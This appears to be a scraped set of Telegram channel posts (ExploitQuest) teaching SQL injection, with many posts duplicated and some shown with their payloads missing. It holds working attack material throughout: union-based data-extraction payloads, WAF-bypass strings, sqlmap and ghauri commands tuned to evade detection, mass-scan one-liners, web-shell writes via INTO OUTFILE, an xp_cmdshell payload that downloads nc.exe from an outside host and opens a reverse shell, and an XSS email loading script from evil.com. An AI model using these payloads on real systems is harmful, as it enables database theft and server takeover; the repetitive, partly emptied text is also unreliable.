Metode untuk mencari kerentanan Sqli :
Command Line Tools Like a Pro
1.
2.
3.
4.
5.
#sqli #sql
Command Line Tools Like a Pro
1.
sublist3r -d target | tee -a domains.txt
2.
cat domains.txt | httpx | tee -a alive.txt
3.
cat alive.txt | waybackurls | tee -a urls.txt
4.
gf sqli urls >> sqli.txt
5.
sqlmap -m sqli.txt --dbs --batch --level 3 --risk 2 --time-sec 10 --random-agent
#sqli #sql
β€5π₯2π2π1
π Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1- To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2- To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
The following query is sent to the
database:
Now, to determine if there is Union π Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1_ To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2_ To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
The following query is sent to the database:
Now, to determine if there is Union or not, we have:
With order by, you can extract the number of columns in a database.
Default request:
Test 1:
Test 2:
Above if:
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
default request
default request
default request
not same as Default
So we understand that we have 3 columns
Now with:
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
To get the tables of a database:
To get the columns of a database and a table:
And to get data, we have a column:
#SQLIor not, we have:
With order by, you can extract the number of columns in a database.
Default request:
Test 1:
Test 2:
Above if
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
same as default request
same as default request
same as default request
not same as Default
So we understand that we have 3 columns
Now with:
#sqli
ππ»
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1- To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2- To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
https://site.com?news=22
The following query is sent to the
database:
select * from news where news_id = $newsid;
select * from news where news_id = '$newsid';
select * from news where news_id = "$newsid";
Now, to determine if there is Union π Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1_ To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2_ To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
https://site.com?news=22
The following query is sent to the database:
select * from news where news_id = $newsid;
select * from news where news_id = '$newsid';
select * from news where news_id = "$newsid";
Now, to determine if there is Union or not, we have:
With order by, you can extract the number of columns in a database.
Default request:
page/?id=54
Test 1:
page/?id=54 order by 1
page/?id=54' order by 1 #
page/?id=54" order by 1 #
Test 2:
page/?id=54 order by 1000
page/?id=54' order by 1000#
page/?id=54" order by 1000#
Above if:
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
page/?id=54 order by 1 # same as
default request
page/?id=54 order by 2 # same as
default request
page/?id=54 order by 3 # same as
default request
page/?id=54 order by 4 #
not same as Default
So we understand that we have 3 columns
Now with:
page/?id=54 union select 1,2,3 #
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
page/?id=54 union select 1,2,database()#
To get the tables of a database:
page/?id=54 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' --
To get the columns of a database and a table:
UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name' AND table_schema = 'your_database_name' --
And to get data, we have a column:
UNION SELECT your_column_name FROM your_table_name LIMIT 1 OFFSET 0 --
#SQLIor not, we have:
With order by, you can extract the number of columns in a database.
Default request:
page/?id=54
Test 1:
page/?id=54 order by 1
page/?id=54' order by 1 #
page/?id=54" order by 1 #
Test 2:
page/?id=54 order by 1000
page/?id=54' order by 1000#
page/?id=54" order by 1000#
Above if
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
page/?id=54 order by 1 #
same as default request
page/?id=54 order by 2 #
same as default request
page/?id=54 order by 3 #
same as default request
page/?id=54 order by 4 #
not same as Default
So we understand that we have 3 columns
Now with:
page/?id=54 union select 1,2,3 #
#sqli
ππ»
Salesforce
Salesforce UK: The #1 AI CRM
Salesforce is the #1 AI CRM, helping companies become Agentic Enterprises where humans and agents drive success together through a unified AI, data, and Customer 360 platform.
β€2π2
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
To get the tables of a database:
To get the columns of a database and a table:
And to get data, we have a column:
#SQLI
For example, to get the database name:
(if it returns the third column)
page/?id=54 union select 1,2,database()#
To get the tables of a database:
page/?id=54 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' --
To get the columns of a database and a table:
UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name' AND table_schema = 'your_database_name' --
And to get data, we have a column:
UNION SELECT your_column_name FROM your_table_name LIMIT 1 OFFSET 0 --
#SQLI
π2
π» Disclosed vulnerabilities with bug bounty
1οΈβ£ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details.
2οΈβ£ SQL injection in POST request
Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here.
3οΈβ£ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.
#web #xss #sqli
1οΈβ£ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details.
2οΈβ£ SQL injection in POST request
Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here.
3οΈβ£ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.
#web #xss #sqli
β€7π3π2
ExploitQuest
Photo
ββπ About bypassing protection against SQL injections
Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.
For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations
or by adding specific comments like
https://websec.ca/kb/sql_injection
https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
#web #sqli #bypass #waf
Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.
For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations
( 'AND'1'=1*1 instead of 'AND'1'='1' )
or by adding specific comments like
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
and much more.
For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.
https://websec.ca/kb/sql_injection
https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
#web #sqli #bypass #waf
β€6π₯3
π Transition from SQL injection to shell or backdoor
β«οΈUse the βinto outfileβ command to write to a file:
β«οΈCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
β«οΈreverse netcat shell via mssql injection when xp_cmdshell is available:
#web #sqli
β«οΈUse the βinto outfileβ command to write to a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
β«οΈCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
β«οΈreverse netcat shell via mssql injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web #sqli
π₯4β€1
After exploiting sql injection using the following email address
you can't help but wonder: why the hell did this even get through as a valid email?
In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages ββdeviate a little from what characters can be used.
So, the next magic:
It will validate and legally return an email with the attack vector:
And how the developers display it further is a separate question.
#sqli
"'-sleep(5)-'"@mail.local
you can't help but wonder: why the hell did this even get through as a valid email?
In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages ββdeviate a little from what characters can be used.
So, the next magic:
php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);βIt will validate and legally return an email with the attack vector:
"'--><script/src=//evil.com></script>"@example.com
And how the developers display it further is a separate question.
#sqli
π₯5π1
π Find SQL injection on the site with one command
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
#web #sqli
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
#web #sqli
π11
Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi
SQL Injection (SQLi) is one of the most critical web vulnerabilities, allowing an attacker to manipulate database queries, extract sensitive data, modify records, or even execute system commands (RCE - Remote Code Execution).
This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE.
ββββββββββββββββββ
1. Discovering SQL Injection Vulnerabilities in Multiple Ways
πΉMethod 1: Manual Testing with Special Characters
The simplest way to test for SQL Injection is by inserting special characters such as:
'
"
--
#
;
Example 1: Injecting a Single Quote
'
If a website has a login page like:
https://example.com/login.php?user=admin
Try entering:
https://example.com/login.php?user=admin'
If an error appears like:
You have an error in your SQL syntax...
It indicates an SQL Injection vulnerability.
ββββββββββββββββββ
πΉMethod 2: Injecting Simple SQL Queries
If the backend SQL query looks like this:
SELECT * FROM users WHERE username = '$user' AND password = '$pass'
You can try the following payloads:
admin' --
or
' OR '1'='1' --
If you gain access without entering a password, the application is vulnerable.
ββββββββββββββββββ
πΉ Method 3: Using SQLMap for Automated Testing
πΉ SQLMap is a powerful tool for automated SQL Injection detection. Run:
sqlmap -u "https://example.com/login.php?user=admin" --dbs
SQLMap will analyze the URL and extract the database names if vulnerable.
ββββββββββββββββββ
πΉMethod 4: Testing with SQL Sleep (Time-Based SQLi)
If error messages are hidden, you can test for Time-Based SQLi:
https://example.com/page?id=1' AND SLEEP(5) --
If the page takes 5 seconds to load, the database is likely vulnerable.
ββββββββββββββββββ
πΉMethod 5: Data Extraction via UNION-Based SQL Injection
If a website displays data from a database, try injecting a UNION SELECT query:
https://example.com/page?id=1 UNION SELECT 1,2,3,4 --
If numbers or unexpected data appear, the website is vulnerable.
ββββββββββββββββββ
2. Escalating SQL Injection to RCE (Remote Code Execution)
If SQL Injection allows file operations via LOAD_FILE() or OUTFILE, you can execute commands on the server.
πΉExample: Uploading a Web Shell via SQLi
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
Now, access the shell through:
http://target.com/shell.php?cmd=whoami
πΉIf SQL Server has xp_cmdshell enabled, execute system commands like:
EXEC xp_cmdshell 'whoami';
This will return the current system user running the database service.
ββββββββββββββββββ
3. Exploiting SQL Injection to Gain Admin Access
In some cases, SQLi can be used to escalate privileges by modifying session data:
UPDATE users SET is_admin = 1 WHERE username = 'victim';
Or steal an admin session:
SELECT session_id FROM users WHERE username = 'admin';
π‘ Conclusion
β’Test manually using ' and OR 1=1
β’Use SQLMap for automatic SQLi detection
β’Escalate SQLi to RCE if the system allows file operations
β’Test SQL Sleep (Time-Based Injection) for hidden errors
β’Use UNION SELECT to extract sensitive data
ββββββββββββββββββ
π Join now
[https://t.me/ExploitQuest]
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering
Telegram
ExploitQuest
contact: @ExploitQuestbot
π11β€7
CORS one liner command exploiter
This is an extremely helpful and practical Cheatsheet for Bug Hunters, which helps you find CORS missconfiguration in every possible method. Simply replace https://example.com with the URL you want to target. This will help you scan for CORS vulnerability without the need of an external tool. What you have to do is to copy-and-paste the commands into your terminal and finger crossed for any possible CORS.
Github
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
GitHub
GitHub - kleiton0x00/CORS-one-liner: A one liner Bash command which finds CORS in every possible endpoint.
A one liner Bash command which finds CORS in every possible endpoint. - kleiton0x00/CORS-one-liner
π5π5
Changing HTTP Request Methods and Their Security Impact
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an
unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).
ββββββββββββββββββ
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
β’Database credentials.
β’Environment variables.
β’File paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
ββββββββββββββββββ
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
The server might respond with:
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
This can lead to different reactions from the server, such as:
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an
unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).
ββββββββββββββββββ
Impact on Web Frameworks (e.g., Laravel)
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
β’Database credentials.
β’Environment variables.
β’File paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
ββββββββββββββββββ
Practical Examples
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
curl -X POST http://example.com/
The server might respond with:
HTTP/1.1 405 Method Not Allowed
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
HTTP/1.1 500 Internal Server Error
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
curl -X DELETE http://example.com/delete_user --data "id=1; system('whoami');"
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
π5π₯2β€1
A Simple Yet Effective Way to Find SQLI Vulnerabilities
Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Hereβs an optimized approach:
1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:
waybackurls --dates target.com | grep '?id='
This helps identify pages that may still be vulnerable.
ββββββββββββββββββ
2. Test for SQLI Sleep-Based Vulnerabilities
Use the following payload:
if(now()=sysdate(),SLEEP(8),0)
If the response is delayed by ~8 seconds, the parameter is likely injectable.
ββββββββββββββββββ
3. Manual Testing with cURL
curl -X GET "https://target.com/page.php?id=1" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"
β’The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.
β’Modify headers like User-Agent to mimic real traffic.
ββββββββββββββββββ
4. Automated Testing with Ghauri (Bypassing WAFs)
ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403
--timeout=30: Sets the request timeout to 30 seconds.
--delay=5: Adds a 5-second delay between requests to avoid detection.
--technique=BEST: Uses the most effective SQL injection techniques.
--level=3: Performs more advanced tests for better detection.
--prefix="/**/": Adds a comment prefix to bypass WAF filters.
--suffix="-- -": Ends the payload with a SQL comment to evade detection.
--safe-chars="[]": Prevents certain characters from being URL-encoded.
--random-agent: Uses a random User-Agent to avoid fingerprinting.
--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.
ββββββββββββββββββ
5. Advanced Testing with SQLMap
sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3
--random-agent: Uses random user-agents to avoid detection.
--tamper: Applies obfuscation techniques to evade WAFs.
--risk=3 --level=5: Enables deep scanning with advanced payloads.
ββββββββββββββββββ
Conclusion
β Wayback Machine helps find old endpoints.
β Manual payloads help confirm basic SQL injection.
β Ghauri & SQLMap provide automation with WAF bypass techniques.
ββββββββββββββββββ
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
Telegram
ExploitQuest
contact: @ExploitQuestbot
β€8π2π₯1
These commands and URLs are used for gathering and analyzing data about a specific domain (example.com in this case).
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
β’This query retrieves all archived URLs of example.com from Wayback Machine.
β’*.example.com/* searches for all subdomains and pages.
β’collapse=urlkey removes duplicate URLs.
β’output=text formats the output as
plain text.
β’fl=original extracts only the original URLs without extra metadata.
ββββββββββββββββββ
Explanation:
β’Retrieves a security report for example.com from VirusTotal.
β’This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
β’Replace YOUR_API_KEY with a valid VirusTotal API key.
ββββββββββββββββββ
Explanation:
β’Queries AlienVault OTX for URLs associated with domain.com.
β’limit=500 retrieves up to 500 URLs per page.
β’page=1 fetches the first page of results.
ββββββββββββββββββ
Explanation:
β’Fetches all archived URLs of example.com from Wayback Machine.
β’Saves the output to out.txt for further processing.
ββββββββββββββββββ
Explanation:
1-cat out.txt β Reads the archived URLs from out.txt.
2-uro β Deduplicates and normalizes URLs.
3-grep -E β Uses regular expressions (regex) to extract potentially sensitive files, such as:
β’Database files: .sql, .db, .backup
β’Documents: .xls, .xlsx, .doc, .pdf, .txt
β’Compressed archives: .zip, .tar.gz, .rar, .7z
β’Encryption keys: .pem, .crt, .key, .asc
β’Configuration files: .config, .ini, .yaml, .yml
β’Executable files: .exe, .dll, .apk, .msi
ββββββββββββββββββ
π Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
1οΈβ£ Using Archive.org to Find Archived URLs
URL:
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
Explanation:
β’This query retrieves all archived URLs of example.com from Wayback Machine.
β’*.example.com/* searches for all subdomains and pages.
β’collapse=urlkey removes duplicate URLs.
β’output=text formats the output as
plain text.
β’fl=original extracts only the original URLs without extra metadata.
ββββββββββββββββββ
2οΈβ£ Using VirusTotal to Get a Domain Report
URL:
https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com
Explanation:
β’Retrieves a security report for example.com from VirusTotal.
β’This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
β’Replace YOUR_API_KEY with a valid VirusTotal API key.
ββββββββββββββββββ
3οΈβ£ Using AlienVault OTX to Fetch URLs Related to a Domain
URL:
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
Explanation:
β’Queries AlienVault OTX for URLs associated with domain.com.
β’limit=500 retrieves up to 500 URLs per page.
β’page=1 fetches the first page of results.
ββββββββββββββββββ
4οΈβ£ Using curl to Fetch Archived URLs and Save Them to a File
Command:
curl -G "https://web.archive.org/cdx/search/cdx" \
--data-urlencode "url=*.example.com/*" \
--data-urlencode "collapse=urlkey" \
--data-urlencode "output=text" \
--data-urlencode "fl=original" > out.txt
Explanation:
β’Fetches all archived URLs of example.com from Wayback Machine.
β’Saves the output to out.txt for further processing.
ββββββββββββββββββ
5οΈβ£ Extracting Sensitive Files Using uro and grep
Command:
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Explanation:
1-cat out.txt β Reads the archived URLs from out.txt.
2-uro β Deduplicates and normalizes URLs.
3-grep -E β Uses regular expressions (regex) to extract potentially sensitive files, such as:
β’Database files: .sql, .db, .backup
β’Documents: .xls, .xlsx, .doc, .pdf, .txt
β’Compressed archives: .zip, .tar.gz, .rar, .7z
β’Encryption keys: .pem, .crt, .key, .asc
β’Configuration files: .config, .ini, .yaml, .yml
β’Executable files: .exe, .dll, .apk, .msi
ββββββββββββββββββ
π Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
β€6π5